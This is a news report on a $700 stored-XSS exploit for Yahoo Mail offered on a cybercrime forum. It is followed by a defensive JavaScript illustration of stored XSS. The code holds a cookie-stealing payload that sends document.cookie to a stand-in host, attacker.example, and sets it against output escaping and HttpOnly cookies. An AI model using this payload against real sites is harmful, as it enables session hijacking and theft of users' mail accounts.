
Yahoo Mail hijacking exploit selling for $700

XSS vulnerability allows attackers to steal and replace session cookies, as well as read and send e-mail from a victim’s account.

An exploit selling for $700 may put millions of Yahoo Mail users at risk of having their e-mail account hijacked and their browsers redirected to malicious sites.

Marketed by an allegedly Egyptian hacker on a cybercrime forum, the exploit targets a cross-site scripting (XSS) vulnerability in Yahoo.com that allows attackers to steal and replace the victim’s session cookies, as well as read and send e-mail from the victim’s account. Typically, an attacker embeds a malicious link in an e-mail; when the unsuspecting recipient clicks it, the injected script runs inside the victim’s logged-in Yahoo session in the browser, where it can read the cookies and other sensitive information and hand them to the attacker.

“After the victim clicks the link, he will be redirected to the e-mail page again,” the hacker, who goes by the handle TheHell, said in a demonstration video for the hack (see below). “And you can redirect him to wherever you want.”

“I’m selling Yahoo stored XSS that steals Yahoo e-mail cookies and works on ALL browsers,” the hacker explained. “And you don’t need to bypass the IE or Chrome XSS filter, as it does that itself because it’s stored XSS. Prices for such an exploit are around $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people because I don’t want it to be patched soon!”

Meanwhile, Yahoo tells KrebsOnSecurity.com that while the hole can be easily patched, the challenge lies in locating it.

“Fixing it is easy,” Yahoo Director of Security Ramses Martinez told KrebsOnSecurity. “Once we figure out the offending URL, we can have new code deployed in a few hours.”

The flaw is described as a stored (persistent) XSS vulnerability: the attacker’s script is written into a file, database, or back-end system, and the server then serves it back to every browser that requests the stored content. This is also why the seller’s claim about browser XSS filters is credible. The XSS filters in Internet Explorer and Chrome of that era targeted reflected XSS by looking for script that appears in both the request and the response; a payload delivered from server-side storage never appears in the request, so those filters have nothing to match. Fixing the flaw means finding the input that is stored unescaped and escaping it on output, which is consistent with Martinez’s point that the hard part is locating the offending URL, not writing the fix.
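To make the mechanism concrete, here is an added illustration that is not Yahoo’s code and not the exploit being sold: a constructed message body carrying a cookie-stealing payload, a webmail-style render function that echoes stored content unescaped (the stored XSS pattern), the same render with output escaping, and a session cookie set HttpOnly so that document.cookie cannot read it even if script does run. The function names, the payload, and the attacker.example host are all assumptions made for this example.

```javascript
// Added illustration of stored XSS and cookie theft. Not Yahoo's code and not
// the exploit described in the article; every name and payload here is constructed.

// A constructed message body as an attacker might submit it to a webmail app.
// If the server stores it verbatim and later sends it back unescaped, the
// onerror handler runs in each recipient's browser and ships their cookies to
// the (hypothetical) attacker.example host.
const ATTACKER_BODY =
  'Hi, see attached <img src=x onerror="' +
  'new Image().src=\'https://attacker.example/c?\'+encodeURIComponent(document.cookie)">';

// Vulnerable render: interpolates the stored body straight into the page HTML.
function renderMessageVulnerable(from, body) {
  return `<div class="msg"><b>${from}</b><p>${body}</p></div>`;
}

// Minimal HTML escaping for text placed in element content or quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Hardened render: the same stored body is escaped on output, so the browser
// displays the tag text instead of executing it. Storage is untouched; the fix
// is at the point where stored data is written into HTML.
function renderMessageSafe(from, body) {
  return `<div class="msg"><b>${escapeHtml(from)}</b><p>${escapeHtml(body)}</p></div>`;
}

// Crude demo-only check: does the rendered HTML still contain a tag that could
// execute script? Real applications rely on output escaping and a
// Content-Security-Policy, not on a detector like this.
function containsActiveMarkup(html) {
  return /<(script|img|svg|iframe)\b[^>]*(onerror|onload|src)\s*=/i.test(html) ||
         /<script\b/i.test(html);
}

// Second layer of defence: a session cookie flagged HttpOnly is not visible to
// document.cookie, so the exfiltration above gets nothing even if the injection
// succeeds (script can still send requests that carry the cookie, so escaping
// is still required). Returns the value of a Set-Cookie header.
function sessionCookieHeader(name, value, { httpOnly = true, secure = true, sameSite = 'Lax' } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, 'Path=/'];
  if (httpOnly) parts.push('HttpOnly');
  if (secure) parts.push('Secure');
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Run both renderers over the constructed payload and report what each produced.
function demo() {
  const vulnerable = renderMessageVulnerable('alice@example.com', ATTACKER_BODY);
  const safe = renderMessageSafe('alice@example.com', ATTACKER_BODY);
  return {
    vulnerableExecutes: containsActiveMarkup(vulnerable),
    safeExecutes: containsActiveMarkup(safe),
    cookieHeader: sessionCookieHeader('sid', 'constructed-session-id'),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The vulnerable renderer returns the payload intact, so any browser that loads the message fires the onerror handler; the safe renderer returns `&lt;img ...&gt;`, which the browser shows as text. Note that the escaping is applied at output, not at storage time, which is what lets a fix ship as a small code change once the offending page is found.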
